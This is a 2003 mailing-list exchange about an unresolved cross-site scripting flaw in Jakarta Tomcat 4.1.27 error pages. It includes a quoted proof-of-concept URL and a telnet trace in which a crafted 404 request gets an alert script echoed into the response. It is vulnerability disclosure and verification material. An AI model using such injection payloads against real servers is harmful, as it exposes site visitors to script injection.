Anyone know how serious this is? It also appears to affect Tomcat 4.1.27 when using mod_jk as well. Below is a sample trace of a HTTP session. -Dave > telnet localhost 8080 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET /666%0a%0a666.jsp HTTP/1.0 Host: localhost HTTP/1.1 404 /666 666.jsp Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Mon, 29 Sep 2003 18:39:23 GMT Server: Apache Coyote/1.0 Connection: close Apache Tomcat/4.1.27 - Error report

HTTP Status 404 - /666 <script>alert("asdf");</script>666.jsp


type Status report

message /666 <script>alert("asdf");</script>666.jsp

description The requested resource (/666 <script>alert("asdf");</script>666.jsp) is not available.


Apache Tomcat/4.1.27

Connection closed by foreign host. On Sun, September 28, 2003 at 3:14 am, Kan Ogawa sent the following > > Jakarta Tomcat 4.1 cross-site scripting vulnerability, which was > reported last year, is not yet resolved. > > http://www.securityfocus.com/archive/82/288502/2002-08-16/2002-08-22/0 > > I verified this vulnerability on Tomcat 4.1.27 with Coyote HTTP/1.1 > connector. > > http://localhost:8080/666%0a%0a666.jsp > > On the other hand, on Tomcat 5.0, it was not reproduced. > Do you neglect to resolve it to Tomcat 4.x, Tomcat committers? > > Regards, > > -- > Kan Ogawa > super-creek@jcom.home.ne.jp